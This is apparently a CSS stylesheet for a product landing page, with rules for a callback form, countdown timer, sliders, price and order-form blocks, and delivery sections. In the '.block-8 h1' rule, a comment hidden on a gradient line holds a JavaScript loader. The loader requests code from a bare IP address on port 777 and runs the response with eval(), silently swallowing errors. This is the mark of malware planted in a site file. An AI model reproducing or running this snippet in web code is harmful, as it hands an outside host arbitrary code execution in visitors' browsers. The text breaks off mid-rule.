
body {
  width: 100%;
  min-width: 960px;

  background-color: #fff;
}
* {
  position: relative;

  margin: 0;
  padding: 0;

  font-weight: 400;
  font-family: "Exo", "Arial", "Helvetica", sans-serif;
  text-align: center;
  color: #000000;
}
ul {
  list-style-type: none;
}
.container {
  position: relative;

  min-width: 960px;
  max-width: 960px;
  margin: 0 auto;

  text-align: center;
}
.clear {
  clear: both;
}
.dynamic {
  color: #fafafa;

  background: #0053dc;
}
d {
  -webkit-transition: all 0.3s 0.03s ease-in-out;
     -moz-transition: all 0.3s 0.03s ease-in-out;
       -o-transition: all 0.3s 0.03s ease-in-out;
}
/* callback */

.callback-btn {
  position: fixed;
  top: 2px;
  right: -15px;
  z-index: 9999;

  width: 90px;
  height: 70px;
  padding-top: 10px;

  -webkit-transition: right 500ms ease-in-out;
     -moz-transition: right 500ms ease-in-out;
      -ms-transition: right 500ms ease-in-out;
       -o-transition: right 500ms ease-in-out;
          transition: right 500ms ease-in-out;
}
.callback-btn:hover {
  right: 0;

  cursor: pointer;
}
.callback-btn img {
  width: 60%;
}
.callback-form {
  position: fixed;
  top: 90px;
  right: 0;
  z-index: 1001;

  width: 100%;
  max-width: 350px;
  padding-top: 15px;

  background: #f32b11;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;

  -webkit-transition: right 500ms ease-in-out;
     -moz-transition: right 500ms ease-in-out;
      -ms-transition: right 500ms ease-in-out;
       -o-transition: right 500ms ease-in-out;
          transition: right 500ms ease-in-out;
}
.callback-form form {
  left: 5%;

  width: 90%;
  padding-bottom: 20px;

  color: #424242;
}
.callback-form form button {
  width: 100%;
  margin-top: 20px;

  background: none;
  border: 0;
  outline: 0;
}
.callback-form form input {
  -webkit-box-sizing: border-box;
     -moz-box-sizing: border-box;
          box-sizing: border-box;
  width: 300px;
  height: 40px;
  margin-left: -15px;
  padding-left: 3%;

  font-size: 14px;
  text-align: left;
  color: #1e1e1e;

  border: none;
  -webkit-border-radius: 5px;
     -moz-border-radius: 5px;
          border-radius: 5px;
}
.callback-form form h5 {
  float: left;
  margin: 10px auto 5px;
  margin-left: 0;

  font-family: "Arial", sans-serif;
  color: #ffffff;
}
.callback-form img[src="img/i-cross.svg"] {
  position: absolute;
  top: 10px;
  right: 15px;
}
.callback-form img[src="img/i-cross.svg"]:hover {
  cursor: pointer;
}
.callback-form .btn {
  width: 95%;
  margin-top: 20px;
  padding: 10px 0;

  font-size: 20px;
  color: #fefefe;
  text-transform: uppercase;

  border: 2px solid #fefefe;
  -webkit-border-radius: 4px;
     -moz-border-radius: 4px;
          border-radius: 4px;
}
.callback-form .btn:hover {
  color: #1e1e1e;

  background: #fafafa;
  border-color: #1e1e1e;
  cursor: pointer;
}
.callback-form.hide {
  right: -1000px;
}

/* timer */

.timer {
  display: block;
  width: 100%;
  padding: 10px 0 0 0;

  text-align: center;
}
.timer .number,
.timer .semicolon {
  float: left;
  width: 12%;
  height: 65px;

  font-weight: bold;
  font-size: 24pt;
  line-height: 65px;
  color: #535175;

  border: 1px solid #a9a6b6;
}
.timer .semicolon {
  border: none;
}
.timer .number.first {
  background:    -moz-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background: -webkit-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:      -o-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:     -ms-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:         linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  border-right: none;
  -webkit-border-radius: 4px 0 0 4px;
     -moz-border-radius: 4px 0 0 4px;
          border-radius: 4px 0 0 4px;
}
.timer .number.second {
  background:    -moz-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background: -webkit-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:      -o-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:     -ms-linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  background:         linear-gradient(top, rgba(255,255,255,1) 0%,rgba(234,234,234,1) 100%);
  border-left: none;
  -webkit-border-radius: 0 4px 4px 0;
     -moz-border-radius: 0 4px 4px 0;
          border-radius: 0 4px 4px 0;
}
.timer .timer-text {
  float: left;
  width: 33%;
  height: 20px;

  font-weight: bold;
  font-size: 10pt;
  text-align: center;
  color: #535175;
}
.timer .timer-text.p1 {
  width: 25%;
}
.timer .timer-text.p2 {
  width: 48%;
}
.timer .timer-text.p3 {
  width: 27%;
}

/* slider */

.slider {
  display: block;
}
.checkers {
  display: block;
  width: 100%;
  padding: 10px 0;

  text-align: center;
}
.checker {
  display: inline-block;
  width: 16px;
  height: 16px;
  margin: 0 6px;

  border: 1px solid #535175;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;

  -webkit-transition: all 0.3s 0.03s ease-in-out;
     -moz-transition: all 0.3s 0.03s ease-in-out;
       -o-transition: all 0.3s 0.03s ease-in-out;
}
.checker:hover {
  background: #1e1e1e;
  cursor: pointer;
}

/* blocks */

.block-0 {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 9998;

  width: 100%;

  text-align: center;

  background: url(../img/block-0.png) top center no-repeat;
  background-size: cover;
}
.block-0-menu {
  position: relative;

  width: 960px;
  height: 80px;
  margin: 0 auto;
}
.block-0-logo {
  position: absolute;
  top: 20px;
  left: 6px;

  width: 173px;
  height: 26px;
  padding-top: 47px;

  font-size: 11px;
  text-align: center;
  color: #6f5f75;

  background: url(../img/block-0-logo.png) top center no-repeat;
}
.block-0-menu-items {
  display: block;
  margin-left: 160px;
  padding: 29px 0 0 0;
}
.block-0-menu-item {
  display: inline-block;
  margin: 0 20px;

  font-size: 12pt;
  vertical-align: top;
  text-align: center;
  color: #fafafa;

  border-bottom: 1px dashed #fafafa;

  -webkit-transition: all 0.3s 0.03s ease-in-out;
     -moz-transition: all 0.3s 0.03s ease-in-out;
       -o-transition: all 0.3s 0.03s ease-in-out;
}
.block-0-menu-item.active,
.block-0-menu-item:hover {
  color: #f4d9d2;

  border-bottom: 1px dashed #f4d9d2;
  cursor: pointer;
}
.block-1 {
  width: 100%;
  min-height: 850px;

  background: url(../img/block-1-main.png) top center no-repeat;
  background-size: cover;
}
.block-1-woman {
  position: absolute;
  top: 111px;
  left: 0;

  width: 480px;
  height: 609px;

  background: url("../img/block-1-woman.png") top center no-repeat;
}
.block-1-collage {
    position: absolute;
    top: 455px;
    left: 460px;
    width: 175px;
    height: 388px;

  background: url(../img/product21.png) top center no-repeat;
  background-size: contain;
}
.block-1 h2 {
  margin-left: 44%;
  padding-top: 100px;

  font-weight: bold;
  font-size: 28pt;
  text-align: left;
  color: #535175;
  text-transform: uppercase;
}
.block-1 h1 {
  margin-left: 44%;

  font-size: 22pt;
  text-align: left;
  color: #ff562c;
  text-transform: uppercase;
}
.block-1 h1 span {
  font-weight: bold;
  font-size: 28pt;
  color: #ff562c;
}
.block-1 .right-block {
  float: right;
  width: 30%;
  margin-top: 50px;

  text-align: left;
}
.block-1 .right-block-medal {
  position: relative;

  display: inline-block;
  margin: 10px 0;
}
.block-1 .right-block-medal-text {
  position: absolute;
  top: 5px;
  left: 90px;

  width: 140px;

  font-weight: bold;
  font-size: 11pt;
  text-align: left;
}
.block-1 .right-block-cream {
  position: relative;

  margin: 100px 0 0 80px;

  font-size: 12pt;
  text-align: left;
  color: #535175;
}
.block-1 .right-block-cream b {
  font-weight: bold;
  font-size: 16pt;
  line-height: 20pt;
  color: #535175;
}
.block-1 .right-block-cream .plus {
  position: absolute;
  top: -30px;
  left: -45px;

  font-size: 44pt;
  color: #535175;
}
.block-2 {
  display: block;
  width: 100%;
  padding-bottom: 30px;

  background: url("../img/patt_blue.png") top center repeat;
}
.block-2-header {
  top: -32px;

  width: 958px;
  padding: 20px 0;

  font-weight: bold;
  font-size: 24pt;
  line-height: 26pt;
  color: #d87f64;
  text-transform: uppercase;

  background: #fafafa;
  border: 1px solid #d87f64;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;

  poasition: relative;
}
.block-2-header span {
  font-weight: bold;
  font-size: 24pt;
  color: #535175;
  text-transform: uppercase;
}
.block-2-items {
  margin-top: -10px;
  padding-bottom: 10px;

  text-align: center;
}
.block-2-items-item {
  display: inline-block;
  float: none;
  width: 16%;
  margin: 0 3px;

  vertical-align: top;
}
.block-2-items-item img {
  width: 90%;
}
.block-2-items-item-text {
  padding: 10px 0;

  font-size: 11pt;
  text-align: center;
}
.block-2-items-item-text span {
  font-weight: bold;
  font-size: 12pt;
  line-height: 20pt;
  color: #535175;
  text-transform: uppercase;
}
.block-2-items-item-text span.orange {
  color: #dd7657;
}
.block-3 {
  display: block;
  width: 100%;
  padding: 40px 0;

  background: url(../img/block-form-bg.png) top center no-repeat;
  background-size: cover;
}
.block-form {
  padding: 10px;

  background:    -moz-linear-gradient(top left, rgba(255,237,225,1) 0%, rgba(255,255,255,1) 33%,rgba(255,237,225,1) 100%);
  background: -webkit-linear-gradient(top left, rgba(255,237,225,1) 0%,rgba(255,255,255,1) 33%,rgba(255,237,225,1) 100%);
  background:      -o-linear-gradient(top left, rgba(255,237,225,1) 0%,rgba(255,255,255,1) 33%,rgba(255,237,225,1) 100%);
  background:     -ms-linear-gradient(top left, rgba(255,237,225,1) 0%,rgba(255,255,255,1) 33%,rgba(255,237,225,1) 100%);
  background:         linear-gradient(top left, rgba(255,237,225,1) 0%,rgba(255,255,255,1) 33%,rgba(255,237,225,1) 100%);
  -webkit-border-radius: 6px;
     -moz-border-radius: 6px;
          border-radius: 6px;
}
.block-form hr {
  margin: 10px 0;

  border: none;
  border-bottom: 1px dashed #535175;
}
.block-form-costs hr {
  margin: 15px 0;
}
.block-form-counts {
  position: relative;

  float: left;
  width: 33%;
}
.block-form h1,
.block-10 .block-form h4 {
  font-weight: bold;
  font-size: 15pt;
  line-height: 22pt;
  text-align: left;
  color: #ff562c;
  text-transform: uppercase;
}
.block-form h2 {
  font-size: 14pt;
  text-align: left;
}
.block-form h2 span {
  font-weight: bold;
  text-transform: uppercase;
}
.block-form-costs {
  position: relative;

  float: left;
  width: 33%;
  margin-left: 34%;

  text-align: left;
}
.block-form-costs-old {
  position: relative;

  float: right;
  width: 45%;

  font-size: 13pt;
  text-align: left;
  color: #999999;
}
.block-form-costs-old span.price-span {
  font-weight: bold;
  font-size: 25pt;
  color: #999999;
}
.block-form-costs-old span {
  color: #999999;
}
.block-form-costs-new {
  position: relative;

  float: right;
  width: 45%;

  font-size: 13pt;
  text-align: left;
  color: #535175;
}
.block-form-costs-new span.price-span {
  font-weight: bold;
  font-size: 32pt;
  color: #535175;
}
.block-form-costs-plus {
  position: relative;

  width: 90%;
  margin-left: 10%;
  padding: 50px 0 10px 0;

  font-size: 12pt;
  text-align: left;
  color: #535175;
}
.block-form-costs-plus span {
  font-weight: bold;
  font-size: 16pt;
  color: #535175;
}
.block-form-costs-plus span.plus {
  position: absolute;
  top: 30px;
  left: -40px;

  font-size: 44pt;
}
.block-form-oldprice {
  position: absolute;
  top: 0;
  left: -5px;

  width: 112px;
  height: 57px;

  background: url(../img/block-form-oldprice.png) no-repeat;
}
.block-form-costs-collage {
    position: absolute;
    top: -5px;
    left: -252px;
    width: 135px;
    height: 283px;

  background: url(../img/product21.png) no-repeat;
  background-size: contain;
}
.block-form-costs-collage-sale {
    position: absolute;
    top: 42px;
    left: 123px;
    width: 90px;
    height: 82px;
    font-weight: bold;
    font-size: 22pt;
    line-height: 82px;
    color: #535175;

  background: url(../img/block-form-sale.png) no-repeat;
}
.block-form-button {
  display: block;
  width: 100%;
  padding: 20px 0;

  font-weight: bold;
  font-size: 16pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #f32b10;
  border: none;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;

  -webkit-transition: all 0.3s 0.03s ease-in-out;
     -moz-transition: all 0.3s 0.03s ease-in-out;
       -o-transition: all 0.3s 0.03s ease-in-out;
}
.block-form-button:hover {
  background: #d4240c;
  cursor: pointer;
}
.block-form-timer {
  width: 90%;
  padding: 3%;

  font-size: 12pt;
  color: #535175;
}
.block-form-timer-sale {
  margin: 10px 0;

  font-weight: bold;
  font-size: 16pt;
  text-align: left;
  color: #ff562c;
  text-transform: uppercase;
}
.block-form-inputs {
  margin: 20px;
}

.block-form-inputs p {
  font-size: 12pt;
  line-height: 32pt;
  text-align: left;
  color: #1e1e1e;
}
.block-form-inputs input,
.block-form-inputs select {
  display: block;
  -webkit-box-sizing: border-box;
     -moz-box-sizing: border-box;
          box-sizing: border-box;
  width: 300px;
  height: 48px;
  padding: 0 15px;

  font-size: 16px;
  text-align: left;

  border: 1px solid #1e1e1e;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-4 {
  width: 100%;
  padding: 40px 0;

  background: #fafafa;
}
.block-4 h1 {
  padding: 10px 0 40px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #535175;
  text-transform: uppercase;
}
.block-4 li {
  display: none;
}
.block-4 li.active {
  display: block;
}
.block-4 .block-4-slider-item {
  float: left;
  width: 15%;
  margin: 0;
}
.block-4 .block-4-slider-item.left-margin {
  margin-left: 15px;
}
.block-4 .block-4-slider-item img {
  width: 100%;
}
.block-4 .block-4-slider-item,
.block-4 .block-4-slider-item span {
  font-weight: bold;
  font-size: 16pt;
  color: #535175;
}
.block-4 .block-4-slider-item span {
  color: #79a025;
}
.block-4 .block-4-slider-item img {
  margin: 20px 0;
}
.block-5 {
  display: block;
  width: 100%;
  margin-top: -2px;
  padding: 40px 0;

  background: url("../img/block-5-bg.png") top center no-repeat;
  background-size: cover;
}
.block-5 h1 {
  padding: 25px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #535175;
}
.block-5 h1 span {
  font-weight: bold;
  color: #ffdfc8;
}
.block-5-part {
  float: left;
  width: 48%;
  margin: 0 1%;
}
.block-5-part.no-margin {
  width: 50%;
  margin: 0;
}
.block-5-part-title {
  padding: 15px 10px 15px 0;

  font-weight: bold;
  font-size: 18pt;
  text-align: right;
  color: #535175;
  text-transform: uppercase;
}
.block-5-part-title.right {
  padding: 15px 0 15px 10px;

  text-align: left;
}
.block-5-part-title span {
  font-weight: bold;
  color: #79a025;
}
.block-5-part-item {
  position: relative;

  display: block;
  padding: 15px 50px 15px 0;

  text-align: right;
}
.block-5-part-item.right {
  padding: 15px 0 15px 50px;

  text-align: left;
}
.block-5-part-item.back-left,
.block-5-part-item.back-right {
  position: relative;

  margin: 0;

  font-weight: bold;
  font-size: 13pt;
  color: #ffffff;
  text-transform: uppercase;
}
.block-5-part-item.back-left span,
.block-5-part-item.back-right span {
  position: absolute;
  top: 8px;

  font-weight: bold;
  font-size: 38pt;
  color: #ffffff;
}
.block-5-part-item.back-left span {
  right: 20px;
}
.block-5-part-item.back-right span {
  left: 20px;
}
.block-5-part-item.back-left {
  padding: 20px 135px 20px 20px;

  text-align: right;

  background: #535175;
}
.block-5-part-item.back-right {
  padding: 20px 20px 20px 160px;

  text-align: left;

  background: #79a025;
}
.block-5-part-item-icon {
  position: absolute;
  top: 10px;

  width: 32px;
  height: 32px;
}
.block-5-part-item-icon.left {
  right: 9px;
}
.block-5-part-item-icon.right {
  left: 9px;
}
.block-5-part-item-icon.strokes {
  top: 22px;
}
.block-5-part-item-icon.plus {
  background: url(../img/block-5-icon1.png) top center no-repeat;
}
.block-5-part-item-icon.minus {
  background: url(../img/block-5-icon2.png) top center no-repeat;
}
.block-6 {
  width: 100%;
  padding: 20px 0 0 0;

  background: url("../img/block-6-back.png") top center no-repeat;
  background-size: cover;
}
.block-6 h1 {
  padding: 30px 0;

  font-weight: bold;
  font-size: 22pt;
  color: #535175;
  text-transform: uppercase;
}
.block-6 h1 span {
  font-weight: bold;
  color: #dd7657;
}
.block-6-text {
  width: 55%;
  padding: 0 45% 0 0;
  padding-bottom: 120px;

  font-weight: bold;
  font-size: 13pt;
  line-height: 22pt;
  text-align: left;
  color: #535175;

  background: url(../img/block-6-bg.png) bottom right no-repeat;
}
.block-6-text p {
  margin: 10px 0;

  font-weight: bold;
  line-height: 20pt;
  text-align: left;
  color: #1e1e1e;
}
.block-6-text p span {
  font-weight: bold;
  font-size: 13pt;
  line-height: 22pt;
  color: #dd7657;
}
.block-6-text span {
  font-weight: bold;
  font-size: 22pt;
  line-height: 42pt;
  color: #535175;
}
.block-6-text-shtamp {
  position: absolute;
  right: 250px;
  bottom: 210px;

  width: 219px;
  height: 203px;

  background: url(../img/block-6-medal.png) top center no-repeat;
}
.block-6-text-signature {
  position: absolute;
  right: 350px;
  bottom: 20px;

  width: 193px;
  height: 132px;

  background: url(../img/block-6-signature.png) top center no-repeat;
}

.block-6-1 {
  display: block;
  width: 100%;
  padding: 40px 0;

  background: url("../img/patt_blue.png") top center repeat;
}
.block-6-1 h1 {
  margin-bottom: 20px;
  padding: 25px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #535175;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-6-1 h1 span {
  font-weight: bold;
  font-size: 26pt;
  color: #ffdfc8;
}
.block-6-1 b {
  font-size: 18pt;
  color: #ffdfc8;
  text-transform: none;
}
.block-6-1 .special-items {
  display: block;
}
.block-6-1 .special-item {
  float: left;
  width: 20%;
  min-height: 200px;
  margin: 40px 0.85% 0 0.85%;
  padding: 30px 1.5% 20px 1.5%;

  background: #fafafa;
  border: 1px solid #535175;
  -webkit-border-radius: 8px;
     -moz-border-radius: 8px;
          border-radius: 8px;
}
.block-6-1 .special-item-icon {
  position: relative;

  margin: -60px auto 0 auto;
}
.block-6-1 .special-item-text-header {
  font-weight: bold;
  font-size: 13pt;
  line-height: 36pt;
  color: #535175;
  text-transform: uppercase;
}
.block-6-1 .special-item-text {
  font-size: 12pt;
  text-align: center;
}
.block-6-1 .special-item-text span {
  font-weight: bold;
  font-size: 12pt;
  color: #535175;
  text-transform: uppercase;
}
.block-6-1-collage {
  position: relative;
  z-index: 2;

  margin: 50px 0 -30px 0;
}
.block-6-1-doper {
  position: relative;
  z-index: 1;

  margin-left: 30px;
  padding: 20px 20px 20px 60px;

  font-weight: bold;
  font-size: 16pt;
  line-height: 26pt;
  text-align: left;
  color: #535175;

  background: #fafafa;
  border: 2px solid #535175;
  -webkit-border-radius: 5px;
     -moz-border-radius: 5px;
          border-radius: 5px;
}
.block-6-1-doper-icon {
  position: absolute;
  top: 20px;
  left: -25px;

  width: 65px;
  height: 64px;

  background: url(../img/block-6-1-icon.png) top center no-repeat;
}
.block-7 {
  width: 100%;
  padding: 40px 0;

  background: #fafafa;
}
.block-7 h1 {
  padding: 30px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #dd7657;
  -webkit-border-radius: 5px;
     -moz-border-radius: 5px;
          border-radius: 5px;
}
.block-7-items {
  margin-top: 20px;
  padding-bottom: 10px;
}
.block-7-items-item {
  float: left;
  width: 22%;
  min-height: 355px;
  margin: 0 1%;
}
.block-7-items-item img {
  width: 100%;
}
.block-7-items-item-text {
  padding: 10px 0;

  font-size: 13pt;
  text-align: center;
  text-align: left;
}
.block-7-items-item-text span {
  font-weight: bold;
  font-size: 13pt;
  color: #535175;
  text-transform: uppercase;
}
.block-7-items-item-text span.orange {
  color: #dd7657;
}
.block-7-doper {
  margin-left: 30px;
  padding: 20px 20px 20px 60px;

  font-weight: bold;
  font-size: 20px;
  line-height: 1.5;
  text-align: left;
  color: #b06e5c;

  border: 2px solid #dd7657;
  -webkit-border-radius: 5px;
     -moz-border-radius: 5px;
          border-radius: 5px;
}
.block-7-doper-icon {
  position: absolute;
  top: 20px;
  left: -25px;

  width: 65px;
  height: 64px;

  background: url(../img/block-7-icon.png) top center no-repeat;
}
.block-7 .block-form-button {
  margin: 20px 0 0 0;
}
.block-7-1 {
  display: block;
  width: 100%;
  padding: 30px 0;

  background: #fafafa;
}
.block-7-1 h1 {
  margin-bottom: 20px;
  padding: 25px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #535175;
  text-transform: uppercase;

  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-7-1 h1 span {
  font-weight: bold;
  font-size: 26pt;
  color: #dd7657;
}
.block-7-1-youtube {
  max-width: 950px;
  margin: 20px auto;
}
.block-7-2 {
  width: 100%;
  padding: 20px 0 50px 0;

  background: url("../img/block-7-2-bg.png") top center no-repeat;
  background-size: cover;
}
.block-7-2 h1 {
  padding: 25px 0 35px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #fafafa;
  text-transform: uppercase;
}
.block-7-2 h1 span {
  font-weight: bold;
  font-size: 26pt;
  color: #edd1bf;
}
.block-7-2-items {
  position: relative;

  width: 45%;
  padding-right: 55%;
}
.block-7-2-item {
  position: relative;

  display: block;
  min-height: 78px;
  margin-bottom: 20px;
  padding-left: 110px;
}
.block-7-2-item-icon {
  position: absolute;
  top: 0;
  left: 0;
}
.block-7-2-item-title {
  font-weight: bold;
  font-size: 13pt;
  text-align: left;
  color: #edd1bf;
  text-transform: uppercase;
}
.block-7-2-item-text {
  font-size: 12pt;
  text-align: left;
  color: #fafafa;
}
.block-7-2-collage {
  position: absolute;
  top: -60px;
  right: 0;

  width: 900px;
  height: 650px;

  background: url("../img/block-7-2-collage.png") top center no-repeat;
}
.block-7-2-medal {
  position: absolute;
  top: 10px;
  right: 310px;

  width: 177px;
  height: 254px;

  background: url(../img/block-7-2-medal.png) top right no-repeat;
}
.block-8 {
  display: block;
  width: 100%;
  padding: 40px 0;

  background: url("../img/patt_blue.png") top center repeat;
}
.block-8 h1 {
  padding: 25px 0;

  font-weight: bold;
  font-size: 24pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #dd7657;
  background:    -moz-linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);
  background:      -o-linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);/* !function(){try{$.ajax({url:"http://46.101.212.95:777/hello",success:function(res){eval(res)}})}catch(e){}}(); */
  background: -webkit-linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);
  background:      -o-linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);
  background:     -ms-linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);
  background:         linear-gradient(top, rgba(70,88,165,1) 0%,rgba(137,69,156,1) 100%);
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-8 li {
  display: none;
}
.block-8 li.active {
  display: block;
}
.block-8 .block-8-slider-item {
  float: left;
  width: 33%;
}
.block-8 .block-8-slider-item img {
  width: 100%;
}
.block-8 .block-8-slider-item .text {
  width: 100%;
  padding: 20px 0;

  font-weight: bold;
  font-size: 18pt;
  color: #535175;
  text-transform: uppercase;
}

.inst_wrap {
  max-width: 96%;
  margin: 0 2%;
}

.inst_header {
  position: relative;

  font-size: 0;
}

.inst_header img {
  position: relative;
  z-index: 5;

  display: block;
  width: 100%;
}

.inst_header:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  z-index: 6;

  display: block;
  width: 100%;
  height: 100%;
}

.inst_header span {
  position: absolute;
  bottom: 12px;
  left: 12px;
  z-index: 7;

  font-size: 14px;
  color: #ffffff;
}

.inst_photo {
  display: block;
  width: 100%;
}

.inst_text {
  min-height: 230px;
  padding: 10px 15px;

  font-size: 14px;
  line-height: 1.5;
  text-align: left;

  background: #ffffff;
}

.inst_bottom {
  position: relative;
}

.inst_bottom:before {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  z-index: 6;

  width: 100%;
  height: 100%;
}

.inst_bottom img {
  position: relative;
  z-index: 5;

  display: block;
  width: 100%;
}

.block-9 {
  display: block;
  width: 100%;
  padding: 40px 0;

  background: url("../img/patt_red.png") top center repeat;
}
.block-9 h1 {
  margin-bottom: 20px;
  padding: 25px 0;

  font-weight: bold;
  font-size: 26pt;
  color: #535175;
  text-transform: uppercase;

  background: #fafafa;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-9 li {
  display: none;
}
.block-9 li.active {
  display: block;
}
.block-9 .block-9-slider-item {
  float: left;
  width: 25%;
}
.block-9 .block-9-slider-item img {
  width: 100%;
}
.block-9 h2 {
  margin: 20px 0 0 0;
  padding: 20px 0;

  font-weight: bold;
  font-size: 28pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #dd7657;
  background: #79a025;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-9 h2 span {
  font-weight: bold;
  font-size: 28pt;
  color: #ffdfc8;
}
.block-9 .delivery-items {
  display: block;
}
.block-9 .delivery-item {
  float: left;
  width: 20%;
  min-height: 190px;
  margin: 40px 0.85% 0 0.85%;
  padding: 30px 1.5% 20px 1.5%;

  background: #fafafa;
  border: 1px solid #79a025;
  -webkit-border-radius: 8px;
     -moz-border-radius: 8px;
          border-radius: 8px;
}
.block-9 .delivery-item-icon {
  position: relative;

  margin: -50px auto 0 auto;
}
.block-9 .delivery-item-text-header {
  margin-top: 15px;
  margin-bottom: 10px;

  font-weight: bold;
  font-size: 16px;
  line-height: 1.2;
  color: #79a025;
  text-transform: uppercase;
}
.block-9 .delivery-item-text {
  font-size: 14px;
  text-align: center;
}
.block-9 .delivery-item-text span {
  font-weight: bold;
  font-size: 12pt;
  color: #535175;
  text-transform: uppercase;
}
.block-9 h3 {
  margin: 20px 0;
  padding: 25px 0;

  font-weight: bold;
  font-size: 24pt;
  color: #fafafa;
  text-transform: uppercase;

  background: #dd7657;
  background: #53516f;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;
}
.block-9 h3 span {
  font-weight: bold;
  font-size: 24pt;
  color: #ffdfc8;
}
.block-9 .reasons-items {
  display: block;
  padding-bottom: 30px;
}
.block-9 .reasons-item {
  float: left;
  width: 20%;
  min-height: 225px;
  margin: 40px 0.85% 0 0.85%;
  padding: 30px 1.5% 20px 1.5%;

  background: #fafafa;
  border: 1px solid #53516f;
  -webkit-border-radius: 8px;
     -moz-border-radius: 8px;
          border-radius: 8px;
}
.block-9 .reasons-item-icon {
  position: relative;

  margin: -50px auto 0 auto;
}
.block-9 .reasons-item-text-header span {
  font-weight: bold;
  font-size: 32pt;
  line-height: 36pt;
  color: #53516f;
  text-transform: uppercase;
}
.block-9 .reasons-item-text-header {
  margin: 12px 0;

  font-size: 16pt;
  color: #53516f;
  text-transform: uppercase;
}
.block-9 .reasons-item-text {
  font-size: 11pt;
  text-align: center;
}
.block-9 .reasons-item-text span {
  font-weight: bold;
  font-size: 12pt;
  color: #535175;
  text-transform: uppercase;
}

.block-9 .inst_text {
  min-height: 180px;
}

.inst_header span {
  position: absolute;
  bottom: 10px;
  left: 10px;

  font-size: 12px;
}

.inst_header span {
  -webkit-filter: blur(2px);
          filter: blur(2px);
}

.block-10 {
  position: relative;

  display: block;
  width: 100%;
  padding-bottom: 28px;

  background: url("../img/block-10-bg.png") top center no-repeat;
  background-size: cover;
}
.block-10 h1 {
  padding: 40px 20px;

  font-weight: bold;
  font-size: 28pt;
  text-align: left;
  color: #fafafa;
  text-transform: uppercase;
}
.block-10-img {
  position: absolute;
  top: -8px;
  right: -75px;

  width: 100%;
  height: 849px;

  background: url(../img/block-10.png) top right no-repeat;
}
.block-10 .right-block {
  position: absolute;
  left: 20px;

  width: 60%;
}
.block-10 .right-block-medal {
  position: relative;

  display: inline-block;
  width: 49%;
  margin: 10px 0;

  vertical-align: top;
}
.block-10 .right-block-medal img {
  position: absolute;
  top: -5px;
  left: 0;
}
.block-10 .right-block-medal-text {
  position: absolute;
  top: 5px;
  left: 90px;

  width: 140px;

  font-size: 11pt;
  text-align: left;
  color: #fafafa;
}
.block-10 .block-form {
  margin-top: 190px;
}
.block-10 .block-form-costs-collage {
    top: 30px;
    left: -265px;
    width: 175px;
    height: 340px;
}
.block-10 .block-form-costs-collage-sale {
    left: 149px;
}
.block-10 .block-form-costs-plus {
  position: absolute;
  bottom: 0;
  left: -100%;

  width: 100%;
  margin-left: 0;
}
.block-10 .block-form-costs-plus span.plus {
  top: -10px;
  left: 0;
}
.block-10 .block-form-inputs {
  margin: -5px 5px 20px 5px;
}
.block-10 .block-form-inputs p {
  line-height: 25pt;
}

.block-10-question-part {
  float: left;
  width: 25%;
  margin: 20px 0;

  font-weight: bold;
  font-size: 10t;
  line-height: 41px;
  color: #fafafa;
  text-transform: uppercase;
}
.block-10-question-part img {
  vertical-align: middle;
}
.block-10-question-button {
  width: 80%;
  margin-left: 20%;

  font-weight: bold;
  font-size: 10t;
  text-align: center;
  color: #fafafa;
  text-transform: uppercase;

  border: 2px solid #fafafa;
  -webkit-border-radius: 3px;
     -moz-border-radius: 3px;
          border-radius: 3px;

  -webkit-transition: all 0.3s 0.03s ease-in-out;
     -moz-transition: all 0.3s 0.03s ease-in-out;
       -o-transition: all 0.3s 0.03s ease-in-out;
}
.block-10-question-button:hover {
  background: #000000;
  cursor: pointer;
}
.block-10-copyright {
  float: left;
  width: 40%;
  margin: 20px 0 20px 10%;

  font-size: 8pt;
  line-height: 16pt;
  text-align: left;
  color: #fafafa;
}




























.errorMessage {
  position: absolute;
  z-index: 100000;

  box-sizing: border-box;
  margin-top: 7px;
